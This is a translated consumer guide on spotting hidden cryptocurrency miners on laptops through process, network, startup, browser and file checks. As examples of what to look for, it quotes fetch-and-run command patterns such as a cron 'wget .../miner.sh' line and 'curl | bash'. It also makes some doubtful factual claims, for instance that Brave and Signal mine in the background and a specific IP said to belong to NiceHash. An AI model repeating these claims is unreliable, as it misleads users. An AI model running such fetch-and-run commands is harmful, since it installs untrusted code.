Have you noticed that the laptop starts to slow down for no reason, and the cooler runs at maximum speed even during simple tasks? Your device may be infected hidden miner — malware that uses processor or video card resources to mine cryptocurrency. According to Kaspersky, in 2023 the number of attacks using mining software increased by 43% compared to the previous year. At the same time, 68% of users are not even aware of infection, attributing symptoms to the “age” of the equipment.
In this article you will find 7 proven methodshow to detect a miner on a laptop with Windows 10/11, macOS or Linux - from analyzing CPU load to searching for suspicious processes in startup. We will look at how the built-in tools (Task Manager, Resource Monitor), as well as specialized utilities like Process Explorer or Malwarebytes. And you will also find out what legal programs (for example, browsers or instant messengers) can mine cryptocurrency in the background without your knowledge.
1. Signs of a miner infection: when to sound the alarm
Hidden miners rarely give themselves away with obvious symptoms - their task is to remain undetected for as long as possible. However there is 5 Key Signsthat should alert you:
- 🔥 Constant overheating even under minimal load (CPU temperature is higher
70°Cin idle time). - ⚡ Dramatic reduction in battery life (30-50% compared to normal mode).
- 🐢 System slowdown when opening new tabs in the browser or launching programs.
- 🔊 Constant operation of the cooler at high speeds, even when the laptop is “doing nothing.”
- 📈 Unexplained traffic (if >1 GB of data per day is transferred without your knowledge).
You should be especially wary if symptoms appear after visiting dubious sites, installing pirated software or connecting to public Wi-Fi networks. Mining viruses are often spread through:
- 📂 Hacked programs (cracks, game repacks, Adobe Photoshop, AutoCAD).
- 🌐 Fake updates (for example, fake Flash Player or Java).
- 📧 Phishing emails with malicious attachments (files are especially dangerous
.js,.vbs).
⚠️ Attention: Some legal programs (for example, a browser Brave or messenger Signal) can use device resources for mining in the background. This is spelled out in their user agreements, but is often hidden in the fine print.
- Yes, on your device
- Yes, on a work computer
- No, but I suspect an infection
- No and I don't plan to check
2. Check through Task Manager (Windows) or Activity Monitor (macOS)
The fastest way to identify a miner is to analyze the CPU and video card load in real time. On Windows this is done through Task Manager, on macOS - through Activity Monitor.
Instructions for Windows 10/11:
- Click
Ctrl + Shift + EscorCtrl + Alt + Del → Task Manager. - Go to the tab
Processesand sort the list by columnCPU(descending). - Pay attention to processes that are using CPU on
50%+for no apparent reason. Particularly suspicious:- 🔍 Unknown names (for example,
svchost.exewith high load if you don't have active updates). - 🔍 Processes with random letters/numbers (
a1b2c3.exe). - 🔍 Duplicate tasks (for example, two
chrome.exewith the same PID).
- 🔍 Unknown names (for example,
Autoload - miners are often registered there to start when the PC is turned on.For macOS (Monterey/Ventura):
- Open
Programs → Utilities → Activity Monitor. - Go to the tab
CPUand sort by% CPU. - Look for processes with names like
kernel_task(if loads >200% CPU),WindowServeror unknown.app-files.
| Process | Normal load | Suspicious load | What to do |
|---|---|---|---|
svchost.exe |
0-10% | 30%+ without updates | Check via Process Explorer |
chrome.exe |
5-20% when working | 50%+ in background | Close all tabs, check extensions |
lsass.exe |
0-5% | 15%+ permanently | Scan for viruses |
kernel_task (macOS) |
up to 100% at high load | 200%+ when idle | Check for overheating and miner |
Sorting processes by CPU load|Searching for unknown names (.exe without description)|Checking the "Startup" tab|Analyzing network activity ("Network" tab)|Searching for duplicate processes-->
3. Analysis of network activity: how a miner reveals himself
Mining viruses constantly exchange data with pool servers (for example, NiceHash, MinerGate), so they can be calculated from atypical network traffic. To do this:
On Windows:
- Open
Task Manager → Network Activity. - Pay attention to processes that transfer data even when you are not using the Internet.
- Use the command in
Command line(run as administrator):netstat -ano | findstr "ESTABLISHED"It will show all active connections. Search IP addresses from blacklists of mining pools (For example,
144.217.67.151for NiceHash).
On macOS/Linux:
- Open
Terminaland enter:lsof -i -P | grep -i "established" - Or use
nettop -m tcpfor real-time traffic monitoring.
Suspicious signs:
- 🌍 Connections to IP addresses in Netherlands, Germany or USA (popular locations for mining servers).
- 🔄 Constant exchange of small packets (50-200 KB/s) even during idle time.
- 🚫 Port connections
3333,5555,7777(often used by miners).
Example command to block a suspicious IP
If you find a suspicious IP (for example, 144.217.67.151), you can temporarily block it through the firewall:
netsh advfirewall firewall add rule name="Block Miner" dir=out action=block remoteip=144.217.67.151 enable=yes
4. Check startup and task scheduler
Miners are often registered in startup or create tasks in Task Scheduler (Windows) to start when the laptop is turned on. How to find them:
Startup (Windows/macOS):
- 🪟 Windows:
Start → Settings → Applications → Startup. - 🍎 macOS:
System Preferences → Users and Groups → Login Items.
Look for programs with unfamiliar names or those that load the system upon startup.
Task Scheduler (Windows):
- Click
Win + R, entertaskschd.msc. - Check the folders:
Task Scheduler Library → Microsoft → Windows(look for non-standard tasks).Task Scheduler Library(English version).
.bat, .vbs or .ps1 files).Cron (Linux/macOS):
- Open
Terminaland enter:crontab -l - Look for lines with suspicious commands (for example,
wget http://.../miner.sh).
⚠️ Attention: Some miners disguise themselves as legitimate processes, e.g.Windows UpdateorGoogle Software Updater. If you find a task with the nameUpdate*random_symbols*This is a sure sign of infection.
5. Using specialized utilities to search for miners
If the built-in tools do not help, use specialized programs, which scan the system for the presence of mining software:
| Program | Platform | What is looking for | Link |
|---|---|---|---|
| Process Explorer | Windows | Hidden processes, suspicious DLLs | Official website |
| Malwarebytes | Windows, macOS | Miners, Trojans, Spyware | malwarebytes.com |
| Kaspersky Virus Removal Tool | Windows | Hidden miners in startup and services | kaspersky.ru |
| Bitdefender Adware Removal Tool | Windows | Miners in browsers and extensions | bitdefender.ru |
How to use Process Explorer:
- Download the utility from the official website Microsoft (it's free).
- Run as administrator.
- Click
Ctrl + D- this will highlight all processes signed Microsoft. The rest should be checked manually. - Right-click on the suspicious process →
Properties → Threads. Miners often use high priority threads.
Malwarebytes Scan:
- Install the program and update the database.
- Run
Full scan(not fast!). - Pay attention to the results in categories
PUP (Potentially Unwanted Program)AndTrojan.Miner.
If the antivirus does not find the miner, but you are sure of infection, try running a scan in Safe Mode (click F8 when Windows boots or use msconfig). Many miners do not activate in this mode, allowing them to be detected.
6. Checking the browser for a hidden miner
One of the most common mining methods is through browser extensions or Tabs with malicious JavaScript code. For example, in 2022, hackers hacked more than 4,000 websites and injected a script into them Coinhive, who mined Monero on visitors' computers.
How to check your browser:
- Google Chrome / Yandex Browser / Edge:
- Go to
Settings → Extensions. - Remove any suspicious plugins (especially those that promise to “speed up page loading” or “block ads”).
- Use the built-in
Browser Task Manager(Shift + Esc) to find high CPU usage tabs.
- Go to
- Mozilla Firefox:
- Enter in the address bar
about:addonsand check the plugins. - Use
about:performanceto see which tabs are loading the system.
- Enter in the address bar
Task Manager and see if the browser itself is loading (chrome.exe, firefox.exe) CPU at 30%+ without active actions.List miner extensionsthat should be removed immediately:
- 🚨 SafeBrowse, AdBlock Pro (fake versions).
- 🚨 HD for YouTube, Video Downloader.
- 🚨 SearchManager, Super Optimization.
If the CPU load does not drop after closing the browser, the miner is most likely embedded in the system and not working through a tab. In this case, you need to scan the entire laptop with an antivirus.
7. Checking the file system for suspicious files
Miners often hide their files in system folders or disguise them as legitimate processes. Where to look:
Typical locations:
- 📁
C:\Windows\System32\(look for files with random names likeconsent.exeortaskhostw.exe, if they are not system). - 📁
C:\Users\<Your_name>\AppData\Roaming\(popular place for miners). - 📁
/Library/Application Support/(on macOS). - 📁 Folders with games or pirated software (for example,
C:\Games\GTA V\crack\miner.exe).
How to find:
- On Windows open
Explorer, enable display of hidden files (View → Hidden Elements). - Use a search by modification date: miners are updated frequently, so look for files modified in the last 1-2 days.
- On macOS/Linux use the command:
find / -type f -mtime -2 -name "*.sh" -o -name "*.exe" -o -name "*.pl"It will find all scripts and executable files created in the last 2 days.
Suspicious files:
- 📄 Files without extension or with double (
file.txt.exe). - 📄 Scripts
.bat,.ps1,.vbsin non-standard folders. - 📄 Executable files with names like
update.exe,service.exe,driver.exe.
⚠️ Attention: Do not delete files fromSystem32or/usr/bin/no verification! Many miners disguise themselves as system components (for example,lsass.execan be either a legitimate process or a miner). First check the file via VirusTotal.
FAQ: Frequently asked questions about miners on laptops
Can a miner damage a laptop?
Yes, long-term operation at high temperatures (above 85°C) leads to thermal paste degradation, cooler wear And reduced battery life. In extreme cases it is possible overheating of chips (especially on laptops with weak cooling systems, for example, MacBook Air or Ultrabook).
How does the miner get to the laptop if I haven’t downloaded anything?
There are several ways:
- 🌐 Via browser vulnerabilities (For example, Chrome or Firefox with an outdated version).
- 📧 Via attachments in letters (even if you did not open the file, some viruses are activated during preview).
- 🔌 Via infected USB drives (autorun scripts).
- 📡 Via public Wi-Fi networks (for example, in cafes or airports).
Is it possible to mine on a laptop legally?
Technically yes, but this is highly not recommended:
- 🔋 Laptops are not designed for 24/7 use - this leads to rapid wear.
- 💰 Profitability of mining on a CPU/integrated video card (Intel UHD, AMD Radeon Vega) is minimal - you will spend more on electricity than you earn.
- ⚡ Risk of overheating and video card failure (especially on laptops with NVIDIA GTX/RTX or AMD RX).
What to do if the antivirus does not find the miner, but the laptop slows down?
Try the following steps:
- Run live antivirus (For example, Kaspersky Rescue Disk or Dr.Web LiveUSB) - it scans the system before Windows boots.
- Check network connections through
WiresharkorTCPView. - Roll back the system to a restore point (if the miner appeared recently).
- Reinstalling Windows/macOS (as a last resort).
Can the miner run on Linux?
Yes, although less often. Miners for Linux are usually distributed through:
- 🐧 Fake packages in repositories (for example,
sudo apt-get install fake-package). - 🐧 Server vulnerabilities (if you are using a laptop as a server).
- 🐧 Scripts for automatic software installation (For example,
curl | bash).
Check the system via top, htop or nethogs.